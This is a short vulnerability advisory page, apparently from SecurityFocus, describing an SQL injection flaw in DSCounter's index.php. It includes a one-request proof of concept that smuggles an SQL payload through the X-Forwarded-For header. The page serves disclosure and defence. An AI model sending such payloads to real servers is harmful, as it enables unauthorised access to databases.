info
discussion
exploit
solution
references
DSCounter Index.PHP SQL Injection Vulnerability
This issue can be exploited through a web client.
The following proof of concept has been provided:
Get /index.php HTTP/1.0
Host: [host]
X-Forwarded-For: aaa' or 1/*
Privacy Statement
Copyright 2010, SecurityFocus
